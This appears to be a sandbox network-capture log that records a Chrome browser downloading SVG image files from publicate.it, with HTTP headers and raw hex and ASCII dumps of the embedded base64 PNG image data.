                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 36 38 33 22 20 78 6c 69 6e 6b 3a 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 67 41 41 41 41 49 41 43 41 59 41 41 41 44 30 65 4e 54 36 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 45 52 6c 57 45 6c 6d 54 55 30 41 4b 67 41 41 41 41 67 41 41 59 64 70 41 41 51 41 41 41 41 42 41 41 41 41 47 67 41 41 41 41 41 41 41 36 41 42 41 41 4d 41 41 41 41 42 41 41 45 41 41 4b 41 43 41 41 51 41 41 41 41 42 41 41 41 43 41 4b 41 44 41 41 51 41 41 41 41 42 41 41 41 43 41 41 41 41 41 41 41 4c 2b 4c 57 46 41 41 42 41 41 45 6c 45 51 56 52 34 41 65 32 64 43 5a 67 63 56 62 6e 33 33 31 4d 39 50 64 6b 67 62 41 46 5a 6c 55 56 32 57 56 56 45 51 46 6b 55
                                                                                                                                                                                                        Data Ascii: 683" xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAgAAAAIACAYAAAD0eNT6AAAAAXNSR0IArs4c6QAAAERlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAA6ABAAMAAAABAAEAAKACAAQAAAABAAACAKADAAQAAAABAAACAAAAAAAL+LWFAABAAElEQVR4Ae2dCZgcVbn331M9PdkgbAFZlUV2WVVEQFkU
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 7a 58 2f 69 2f 30 4e 56 77 55 67 66 31 70 46 34 6b 6c 45 76 51 33 56 66 75 38 2f 30 6d 37 6f 2f 53 50 42 45 69 41 42 45 67 67 58 67 4b 52 4a 77 41 59 37 58 38 4d 42 76 79 56 34 46 62 73 34 77 33 69 52 52 6d 5a 4e 68 66 44 4a 62 36 4b 78 77 45 33 52 71 61 42 67 6b 6d 41 42 4b 77 68 55 4e 30 41 4c 54 38 61 4f 35 37 71 48 66 48 44 61 57 66 73 49 37 4b 74 69 44 74 4f 6c 4c 4d 4f 48 71 47 75 41 30 4f 39 31 34 6f 42 31 49 76 78 2f 6a 33 30 72 72 34 6e 32 76 58 2b 58 34 54 50 2f 38 42 33 37 67 4a 38 62 7a 77 6a 35 61 58 50 71 49 74 75 65 52 66 6e 65 4a 44 41 57 67 51 69 54 51 42 30 61 32 45 66 74 50 74 33 51 2b 76 6f 74 54 54 7a 68 42 38 43 37 34 72 72 37 4b 4e 6d 7a 6c 33 6f 70 78 4c 4c 6b 67 41 4a 32 45 39 41 54 79 6c 73 6a 49 62 37 59 44 54 59 68 36 44 42 78
                                                                                                                                                                                                        Data Ascii: zX/i/0NVwUgf1pF4klEvQ3Vfu8/0m7o/SPBEiABEggXgKRJwAY7X8MBvyV4Fbs4w3iRRmZNhfDJb6KxwE3RqaBgkmABKwhUN0ALT8aO57qHfHDaWfsI7KtiDtOlLMOHqGuA0O914oB1Ivx/j30rr4n2vX+X4TP/8B37gJ8bzwj5aXPqItueRfneJDAWgQiTQB0a2EftPt3Q+votTTzhB8C74rr7KNmzl3opxLLkgAJ2E9ATylsjIb7YDTYh6DBx
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 78 54 2f 35 71 65 46 76 58 64 32 65 4b 61 47 6e 77 4f 46 56 4e 37 37 77 69 52 54 35 6c 78 70 58 36 65 67 44 4b 6a 5a 4e 42 69 6f 32 2f 2b 64 73 46 69 64 69 6f 67 6e 6b 7a 61 41 45 4a 70 4a 63 41 66 76 6b 66 6a 73 62 75 66 2b 45 68 47 2f 39 56 59 56 5a 59 4f 66 44 6e 59 48 50 4d 71 6c 4e 38 6c 78 51 43 39 53 55 41 6f 6b 35 4c 69 71 50 70 74 31 4e 35 79 52 67 50 45 69 43 42 43 41 68 67 39 37 34 44 4d 4d 31 76 48 6b 52 7a 73 50 50 61 66 48 4e 67 4d 31 74 50 6d 62 44 2f 32 70 64 34 78 6d 59 43 67 54 4e 5a 33 64 4b 30 4e 2f 4c 67 50 39 76 73 58 4f 5a 73 63 39 7a 64 31 62 54 53 45 35 6e 7a 6d 77 36 54 51 49 51 45 64 4f 75 6b 6a 34 68 55 2f 67 49 56 47 30 61 6f 4a 67 57 69 31 5a 76 53 55 39 6c 62 58 56 6a 36 5a 77 71 63 79 59 51 4c 77 58 73 41 48 47 47 58 6a 32
                                                                                                                                                                                                        Data Ascii: xT/5qeFvXd2eKaGnwOFVN77wiRT5lxpX6egDKjZNBio2/+dsFidiognkzaAEJpJcAfvkfjsbuf+EhG/9VYVZYOfDnYHPMqlN8lxQC9SUAok5LiqPpt1N5yRgPEiCBCAhg974DMM1vHkRzsPPafHNgM1tPmbD/2pd4xmYCgTNZ3dK0N/LgP9vsXOZsc9zd1bTSE5nzmw6TQIQEdOukj4hU/gIVG0aoJgWi1ZvSU9lbXVj6ZwqcyYQLwXsAHGGXj2
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 45 50 36 71 54 45 36 45 58 53 59 41 79 51 6b 57 4c 54 56 46 51 44 6b 48 6d 46 4b 64 59 62 33 63 47 38 43 53 34 50 74 4c 41 46 78 35 77 78 4b 37 61 63 5a 77 42 48 71 63 35 63 4d 56 34 58 55 53 49 41 45 58 57 2f 2f 79 69 4a 57 41 71 38 67 38 56 75 43 44 4b 2f 4f 58 41 44 51 32 76 44 71 34 4b 46 36 78 69 6b 43 35 38 57 57 72 37 4b 45 78 4a 47 41 6c 41 62 57 54 6c 57 61 6c 32 53 67 6c 4f 36 62 5a 76 53 54 35 35 69 38 42 6b 4f 32 38 48 6f 43 65 4a 44 6d 59 55 56 76 66 55 68 66 50 66 6a 2b 6a 76 74 4e 74 45 71 69 4a 67 43 34 65 35 4b 33 38 74 31 31 4e 68 56 6b 6f 54 41 4c 62 39 37 45 50 55 79 5a 6c 42 53 44 67 4b 77 46 51 78 61 4c 33 58 50 6e 4e 41 48 70 59 4a 56 34 43 2f 34 70 58 48 62 57 52 51 41 49 4a 39 47 7a 73 4e 66 36 4e 43 62 51 38 36 53 59 33 79 72 4b
                                                                                                                                                                                                        Data Ascii: EP6qTE6EXSYAyQkWLTVFQDkHmFKdYb3cG8CS4PtLAFx5wxK7acZwBHqc5cMV4XUSIAEXW//yiJWAq8g8VuCDK/OXADQ2vDq4KF6xikC58WWr7KExJGAlAbWTlWal2SglO6bZvST55i8BkO28HoCeJDmYUVvfUhfPfj+jvtNtEqiJgC4e5K38t11NhVkoTALb97EPUyZlBSDgKwFQxaL3XPnNAHpYJV4C/4pXHbWRQAIJ9GzsNf6NCbQ86SY3yrK
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 54 6d 5a 31 69 66 53 36 6b 64 55 63 63 36 53 52 46 71 65 51 71 4e 44 53 51 43 71 75 38 39 70 4e 53 32 46 66 4c 4c 6b 30 6a 69 4d 43 35 69 76 57 79 65 63 69 33 6c 52 47 4e 37 42 67 77 51 79 51 38 42 62 32 70 78 48 48 41 53 55 76 6a 30 4f 4e 64 52 52 47 34 46 51 45 6f 43 71 71 73 61 64 72 6b 61 7a 63 58 39 74 61 6c 6e 4b 55 67 49 35 74 50 30 58 53 6d 76 54 7a 62 70 34 39 50 71 57 32 6b 69 7a 53 43 42 63 41 6f 36 2b 4c 6c 79 42 6c 44 59 6f 41 61 56 4c 67 31 37 6a 68 64 67 4a 68 50 70 4c 54 30 2b 5a 75 4a 4d 34 72 6a 66 46 67 2b 76 50 78 78 37 4b 30 42 58 2b 44 62 45 38 56 6b 30 72 50 52 47 36 5a 41 6f 6b 41 63 73 49 36 4e 61 6d 70 32 48 53 7a 70 61 5a 6c 54 5a 7a 46 71 72 32 4c 6a 4b 32 4b 4b 72 68 39 51 44 41 4b 54 56 7a 37 6b 4b 4d 4c 4a 39 6c 6b 58 38 30
                                                                                                                                                                                                        Data Ascii: TmZ1ifS6kdUcc6SRFqeQqNDSQCqu89pNS2FfLLk0jiMC5ivWyeci3lRGN7BgwQyQ8Bb2pxHHASUvj0ONdRRG4FQEoCqqsadrkazcX9talnKUgI5tP0XSmvTzbp49PqW2kizSCBcAo6+LlyBlDYoAaVLg17jhdgJhPpLT0+ZuJM4rjfFg+vPxx7K0BX+DbE8Vk0rPRG6ZAokAcsI6Namp2HSzpaZlTZzFqr2LjK2KKrh9QDAKTVz7kKMLJ9lkX80
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 4e 57 77 47 39 77 74 58 48 67 45 70 6b 2f 75 78 78 72 67 6e 79 52 4b 2f 34 6c 36 7a 36 77 49 67 48 77 6b 4f 6c 7a 6a 31 78 58 38 71 4d 75 78 74 76 4a 79 55 4a 49 61 33 30 51 36 4a 42 46 36 35 32 75 4f 6a 71 34 36 35 6f 50 61 43 78 71 42 77 48 64 4e 75 46 6f 30 65 6f 36 57 4a 4f 7a 77 79 4a 72 72 48 43 78 63 4e 4a 45 4c 4b 55 38 7a 78 71 4c 61 45 68 4e 42 4b 78 4a 41 46 5a 59 32 2f 64 48 64 67 6b 2b 62 37 76 69 48 50 39 50 46 59 48 37 4d 41 69 30 71 54 6f 4f 4a 46 56 75 30 5a 6b 73 45 4e 42 74 54 64 2f 41 77 4d 43 66 5a 73 48 58 47 6e 33 30 78 76 72 2b 4a 7a 61 41 36 36 69 78 50 49 74 5a 52 4d 44 59 47 49 44 42 47 4b 6a 70 38 32 36 53 4a 55 74 32 77 52 2f 5a 75 53 69 7a 65 4c 42 79 43 54 79 2f 47 47 50 69 4f 32 47 33 6d 30 44 62 77 7a 54 35 73 39 4c 74 2f
                                                                                                                                                                                                        Data Ascii: NWwG9wtXHgEpk/uxxrgnyRK/4l6z6wIgHwkOlzj1xX8qMuxtvJyUJIa30Q6JBF652uOjq465oPaCxqBwHdNuFo0eo6WJOzwyJrrHCxcNJELKU8zxqLaEhNBKxJAFZY2/dHdgk+b7viHP9PFYH7MAi0qToOJFVu0ZksENBtTd/AwMCfZsHXGn30xvr+JzaA66ixPItZRMDYGIDBGKjp826SJUt2wR/ZuSizeLByCTy/GGPiO2G3m0DbwzT5s9Lt/
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 76 53 30 32 4d 7a 79 77 6c 31 38 71 79 78 73 6e 71 34 74 6e 76 78 36 65 55 6d 6b 67 67 48 41 4a 34 76 4c 65 4f 6c 4a 30 72 49 61 30 51 6a 73 53 49 70 47 68 39 6e 54 54 71 6b 7a 6b 6c 4e 79 4b 2b 46 6f 72 4e 65 6a 65 7a 68 53 48 70 4e 55 6c 4e 4c 2f 30 44 4b 79 4c 75 68 30 39 63 59 6c 50 4c 4a 42 6e 52 2f 59 69 65 55 74 6a 46 32 6f 44 52 4d 42 49 59 68 45 42 76 67 36 6f 66 48 2b 53 79 52 61 65 64 78 39 6e 34 57 78 53 4f 47 45 78 68 41 68 41 44 35 4b 41 71 71 69 73 69 74 6e 65 64 68 72 45 49 36 45 61 55 72 48 66 48 37 59 54 35 78 77 39 67 32 75 52 58 67 2f 4a 6b 50 52 49 67 41 52 49 67 67 56 55 45 6d 41 43 73 59 6d 48 74 4f 30 79 2f 75 52 70 72 48 75 77 50 41 2f 39 68 72 5a 48 78 47 4c 59 75 42 6c 62 4e 30 36 30 54 66 71 51 6e 54 38 37 48 6f 35 4a 61 53 49
                                                                                                                                                                                                        Data Ascii: vS02Mzywl18qyxsnq4tnvx6eUmkggHAJ4vLeOlJ0rIa0QjsSIpGh9nTTqkzklNyK+ForNejezhSHpNUlNL/0DKyLuh09cYlPLJBnR/YieUtjF2oDRMBIYhEBvg6ofH+SyRaedx9n4WxSOGExhAhAD5KAqqisitnedhrEI6EaUrHfH7YT5xw9g2uRXg/JkPRIgARIggVUEmACsYmHtO0y/uRprHuwPA/9hrZHxGLYuBlbN060TfqQnT87Ho5JaSI
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 74 46 30 56 35 37 34 68 7a 37 70 66 45 71 57 2b 44 7a 56 75 68 4b 71 53 49 50 70 67 4b 58 63 2f 6f 71 63 32 66 79 6f 4a 78 74 4a 47 45 69 41 42 45 71 69 46 41 42 4f 41 57 69 68 6c 74 49 77 71 6c 53 70 71 65 6d 64 52 6c 42 77 46 42 4e 6d 65 4b 69 69 79 6c 62 6a 36 58 75 34 71 6d 4e 45 2f 42 72 70 4e 41 69 6b 6b 77 41 51 67 68 55 45 4e 32 79 55 31 76 65 73 32 71 62 6a 37 51 4f 37 6a 59 63 74 4f 6d 4c 77 56 75 77 70 65 7a 61 6d 43 43 59 73 63 7a 53 55 42 45 6c 69 4c 41 42 4f 41 74 5a 44 77 78 45 41 45 31 4b 7a 53 63 35 49 66 68 53 35 77 64 65 56 41 31 7a 4e 32 37 67 52 4d 46 66 77 44 70 77 70 6d 4c 4f 70 30 6c 77 52 53 52 6f 41 4a 51 4d 6f 43 47 71 55 37 76 56 4d 46 4f 37 2f 4f 71 59 4a 56 79 6e 74 68 71 75 44 44 75 6d 33 69 59 56 45 79 70 32 77 53 49 41 45
                                                                                                                                                                                                        Data Ascii: tF0V574hz7pfEqW+DzVuhKqSIPpgKXc/oqc2fyoJxtJGEiABEqiFABOAWihltIwqlSpqemdRlBwFBNmeKiiylbj6Xu4qmNE/BrpNAikkwAQghUEN2yU1ves2qbj7QO7jYctOmLwVuwpezamCCYsczSUBEliLABOAtZDwxEAE1KzSc5IfhS5wdeVA1zN27gRMFfwDpwpmLOp0lwRSRoAJQMoCGqU7vVMFO7/OqYJVynthquDDum3iYVEyp2wSIAE


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        123192.168.2.549909104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC703OUTGET /images/send_client.svg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC749INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:26 GMT
                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                        Content-Length: 18810
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "497a-620aa1d1e6229"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cbNm13Ue3%2FsQkssn6KmoG3dtyWoGAD0RXgKVoeJgLuaS0QxoECc5dnw8ZIDwjG9wR0SWEkv0L0xQH7d36wfdU0UfglQgds0VddP1v%2BwTlV9qyxhbw2xLvqOQQ1CJ6w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615d7a960c32c-EWR
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC620INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 31 33 36 70 78 22 20 68 65 69 67 68 74 3d 22 31 33 36 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 33 36 20 31 33 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 36 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 30 2e 33 32 35 2c 30 20 4c 31 30 37 2e 36 37 35
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg width="136px" height="136px" viewBox="0 0 136 136" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <title>6</title> <defs> <path d="M10.325,0 L107.675
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 2e 35 22 20 6f 70 65 72 61 74 6f 72 3d 22 64 69 6c 61 74 65 22 20 69 6e 3d 22 53 6f 75 72 63 65 41 6c 70 68 61 22 20 72 65 73 75 6c 74 3d 22 73 68 61 64 6f 77 53 70 72 65 61 64 4f 75 74 65 72 31 22 3e 3c 2f 66 65 4d 6f 72 70 68 6f 6c 6f 67 79 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 4f 66 66 73 65 74 20 64 78 3d 22 30 22 20 64 79 3d 22 34 22 20 69 6e 3d 22 73 68 61 64 6f 77 53 70 72 65 61 64 4f 75 74 65 72 31 22 20 72 65 73 75 6c 74 3d 22 73 68 61 64 6f 77 4f 66 66 73 65 74 4f 75 74 65 72 31 22 3e 3c 2f 66 65 4f 66 66 73 65 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 47 61 75 73 73 69 61 6e 42 6c 75 72 20 73 74 64 44 65 76 69 61 74 69 6f 6e 3d 22 34 22 20 69 6e 3d 22 73 68 61 64 6f 77 4f 66 66 73 65 74 4f 75 74 65 72 31 22 20 72 65 73
                                                                                                                                                                                                        Data Ascii: .5" operator="dilate" in="SourceAlpha" result="shadowSpreadOuter1"></feMorphology> <feOffset dx="0" dy="4" in="shadowSpreadOuter1" result="shadowOffsetOuter1"></feOffset> <feGaussianBlur stdDeviation="4" in="shadowOffsetOuter1" res
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 5a 41 41 41 41 47 51 43 41 59 41 41 41 43 41 76 7a 62 4d 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 45 52 6c 57 45 6c 6d 54 55 30 41 4b 67 41 41 41 41 67 41 41 59 64 70 41 41 51 41 41 41 41 42 41 41 41 41 47 67 41 41 41 41 41 41 41 36 41 42 41 41 4d 41 41 41 41 42 41 41 45 41 41 4b 41 43 41 41 51 41 41 41 41 42 41 41 41 42 6b 4b 41 44 41 41 51 41 41 41 41 42 41 41 41 42 6b 41 41 41 41 41 41 62 4d 57 2f 4d 41 41 41 77 65 55 6c 45 51 56 52 34 41 65 33 64 65 5a 78 63 56 5a 6e 77 38 65 66 65 57 6e 70 4a 5a 2b 73 6b 4a 4f 6b 6b 44 51 6c 4a 53 4d 4a 45 42 6c 64 30 56 45 41 46 41 73 50 4d 67 49 67 4c 59 48 43 49 43 43 71 4f 5a 6c 37 31 66 66 39 34 35 33 58 57 7a 30 66 48 6d 63 6d
                                                                                                                                                                                                        Data Ascii: Rw0KGgoAAAANSUhEUgAAAZAAAAGQCAYAAACAvzbMAAAAAXNSR0IArs4c6QAAAERlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAA6ABAAMAAAABAAEAAKACAAQAAAABAAABkKADAAQAAAABAAABkAAAAAAbMW/MAAAweUlEQVR4Ae3deZxcVZnw8efeWnpJZ+skJOkkDQlJSMJEBld0VEAFAsPMgIgLYHCICCqOZl71ff9453XWz0fHmcm
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 7a 64 65 4f 75 59 78 56 59 56 66 71 55 54 53 62 33 74 56 61 6c 30 2b 45 6b 69 46 75 45 34 63 46 39 37 65 74 6a 6a 64 4b 47 2f 4c 46 6c 4e 76 56 63 33 63 69 39 51 2f 53 36 61 6b 4a 43 57 71 52 34 6f 48 41 67 67 6b 52 45 44 31 65 45 6c 2f 6f 53 44 46 67 76 51 50 46 50 33 6e 69 76 6e 67 2b 32 31 66 6d 2f 45 39 6c 55 53 65 53 77 6a 42 73 4b 70 4a 41 6a 6e 42 70 4a 4c 48 78 59 76 75 33 48 66 44 37 38 33 79 72 39 76 63 48 69 78 4b 70 34 6f 54 66 4a 55 34 53 6f 2b 4b 66 36 45 4d 53 35 55 6e 49 59 42 41 76 41 55 71 66 75 64 44 6c 55 55 47 63 74 36 52 69 32 62 58 50 66 58 73 6c 75 35 48 74 6a 35 38 77 53 39 55 49 6d 6d 4c 64 77 57 72 55 2f 6f 54 6e 35 44 56 65 62 4d 34 76 6f 74 4b 48 50 55 72 64 39 7a 2b 6c 6d 41 67 2b 4d 68 7a 4c 2b 5a 75 50 64 49 58 58 4a 54 32
                                                                                                                                                                                                        Data Ascii: zdeOuYxVYVfqUTSb3tVal0+EkiFuE4cF97etjjdKG/LFlNvVc3ci9Q/S6akJCWqR4oHAggkRED1eEl/oSDFgvQPFP3nivng+21fm/E9lUSeSwjBsKpJAjnBpJLHxYvu3HfD783yr9vcHixKp4oTfJU4So+Kf6EMS5UnIYBAvAUqfudDlUUGct6Ri2bXPfXslu5Htj58wS9UImmLdwWrU/oTn5DVebM4votKHPUrd9z+lmAg+MhzL+ZuPdIXXJT2
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 77 49 4a 4b 41 56 34 6c 77 4c 5a 50 59 74 4f 35 72 71 36 2b 6f 57 31 47 58 5a 6f 38 54 49 4c 77 30 58 52 51 43 42 34 77 49 4a 61 49 55 34 39 30 2f 30 68 6b 6b 71 65 64 51 56 4a 35 65 32 4b 75 46 47 52 67 41 42 42 45 77 4b 4f 4e 34 4b 63 53 71 42 36 4f 36 72 56 38 35 4b 76 30 63 38 66 37 62 4a 65 34 5a 72 49 34 41 41 41 69 55 42 33 51 70 52 2f 2b 6d 78 6b 44 2f 34 76 65 77 74 36 6a 4e 71 6a 6b 73 79 54 6e 56 68 36 64 6b 4f 59 39 50 79 2b 72 71 73 71 70 62 4b 2f 43 77 37 64 2b 6c 57 70 53 34 49 78 46 54 67 52 43 76 6b 32 51 32 46 4f 64 4e 76 61 57 75 49 61 53 32 47 4c 4c 59 7a 4c 52 43 64 32 54 2f 32 78 2b 50 65 45 2f 6f 79 71 7a 54 7a 79 70 6d 61 44 52 6b 33 76 6f 6b 41 41 6e 45 52 55 4a 39 46 2b 6a 4d 70 6b 77 6e 47 54 42 75 62 6d 52 65 58 59 67 2b 6e 6e
                                                                                                                                                                                                        Data Ascii: wIJKAV4lwLZPYtO5rq6+oW1GXZo8TILw0XRQCB4wIJaIU490/0hkkqedQVJ5e2KuFGRgABBEwKON4KcSqB6O6rV85Kv0c8f7bJe4ZrI4AAAiUB3QpR/+mxkD/4vewt6jNqjksyTnVh6dkOY9Py+rqsqpbK/Cw7d+lWpS4IxFTgRCvk2Q2FOdNvaWuIaS2GLLYzLRCd2T/2x+PeE/oyqzTzypmaDRk3vokAAnERUJ9F+jMpkwnGTBubmReXYg+nn
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 51 66 46 36 4e 6a 51 7a 7a 74 54 77 4e 41 51 54 4d 43 4a 42 41 7a 4c 68 7a 31 53 45 45 35 72 61 6b 5a 66 33 4b 36 58 4c 56 61 2b 70 6b 36 39 36 69 64 50 55 79 77 44 34 45 45 39 39 43 77 42 6f 42 45 6f 67 31 6f 61 41 67 5a 59 47 48 50 6a 35 5a 4e 71 36 61 4c 6c 75 32 35 61 58 6a 55 45 46 79 74 45 62 4b 4e 50 79 4a 67 46 55 43 4a 42 43 72 77 6b 46 68 79 67 49 7a 70 36 51 6b 66 4b 70 56 6c 72 79 75 58 6e 59 64 4b 4d 71 78 41 56 6f 6a 5a 52 76 2b 52 4d 41 57 41 52 4b 49 4c 5a 47 67 48 45 4d 4b 72 50 7a 6f 4a 46 6c 78 56 37 4e 73 62 47 4f 36 37 35 42 41 66 42 4d 42 67 77 49 6b 45 49 50 34 58 48 70 34 41 72 63 76 4f 54 37 64 31 2f 4d 44 61 64 76 48 64 4e 2f 68 71 66 45 73 42 4b 49 58 49 49 46 45 62 38 77 56 71 69 53 77 64 66 55 4d 75 66 65 65 69 55 7a 33 72 5a
                                                                                                                                                                                                        Data Ascii: QfF6NjQzztTwNAQTMCJBAzLhz1SEE5rakZf3K6XLVa+pk696idPUywD4EE99CwBoBEog1oaAgZYGHPj5ZNq6aLlu25aXjUEFytEbKNPyJgFUCJBCrwkFhygIzp6QkfKpVlryuXnYdKMqxAVojZRv+RMAWARKILZGgHEMKrPzoJFlxV7NsbGO675BAfBMBgwIkEIP4XHp4ArcvOT7d1/MDadvHdN/hqfEsBKIXIIFEb8wVqiSwdfUMufeeiUz3rZ
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 44 4f 75 73 57 79 4d 54 56 57 74 6b 58 6b 74 47 37 72 6e 33 73 46 79 34 64 49 2b 78 57 70 54 50 47 73 6b 79 33 64 64 59 44 4c 69 77 48 51 49 6b 45 44 76 69 51 43 6d 47 49 61 42 62 49 34 33 31 61 6f 42 39 71 69 39 68 34 42 75 64 37 71 76 50 47 6a 6c 6c 75 6d 38 33 57 36 45 4d 49 34 51 38 78 54 45 42 45 6f 68 6a 41 55 31 43 64 58 7a 56 47 70 6c 63 4d 64 33 33 7a 73 39 31 47 71 74 32 65 62 70 76 67 32 71 4e 37 4f 30 4d 4a 4a 38 50 78 44 4e 57 47 69 36 4d 51 47 30 46 53 43 43 31 39 65 5a 71 56 52 49 6f 54 2f 65 64 56 5a 72 75 32 31 2f 61 54 38 76 59 34 6b 4d 31 33 58 66 39 79 75 6c 79 37 57 56 31 73 6d 31 76 55 62 70 37 57 58 78 59 70 54 44 7a 4e 70 59 4c 6b 45 41 73 44 78 44 46 4f 37 32 41 6e 75 36 62 31 53 76 59 4a 36 56 6c 30 52 7a 7a 69 77 39 58 4c 5a 2b
                                                                                                                                                                                                        Data Ascii: DOusWyMTVWtkXktG7rn3sFy4dI+xWpTPGsky3ddYDLiwHQIkEDviQCmGIaBbI431aoB9qi9h4Bud7qvPGjllum83W6EMI4Q8xTEBEohjAU1CdXzVGplcMd33zs91Gqt2ebpvg2qN7O0MJJ8PxDNWGi6MQG0FSCC19eZqVRIoT/edVZru21/aT8vY4kM13Xf9yuly7WV1sm1vUbp7WXxYpTDzNpYLkEAsDxDFO72Anu6b1SvYJ6Vl0Rzziw9XLZ+
                                                                                                                                                                                                        2024-08-30 16:16:26 UTC1369INData Raw: 47 4e 77 34 6d 54 78 6f 61 46 41 63 46 6b 68 67 58 41 54 78 46 35 41 62 35 6d 2b 2b 53 76 54 54 32 6d 4e 52 50 47 68 57 6a 6e 64 39 79 50 33 48 5a 4a 35 37 32 73 33 5a 71 63 54 35 34 5a 56 4c 56 4b 66 46 64 6e 62 47 52 78 66 74 54 2f 4b 72 6b 46 6a 6c 65 48 43 73 52 55 67 67 63 51 32 64 42 52 38 73 45 43 35 4e 5a 4a 56 48 36 6f 64 42 36 50 35 55 4e 55 44 37 48 71 36 37 38 77 70 76 68 51 4c 6e 76 68 58 74 38 6d 61 4a 33 6f 48 46 36 55 6d 58 2b 74 56 38 33 6f 78 70 70 37 75 75 33 6d 50 57 6e 78 34 56 47 32 46 6f 6c 62 35 38 30 43 67 56 67 49 6b 6b 46 70 4a 63 35 32 61 43 4e 54 71 41 4b 65 54 30 33 31 6e 5a 57 54 35 46 77 2f 4c 68 55 76 33 31 4b 52 2b 51 31 31 45 54 2f 66 64 70 46 6f 6a 59 78 75 6c 74 45 56 4d 46 47 4e 42 51 31 32 58 37 79 46 41 41 75 45 65
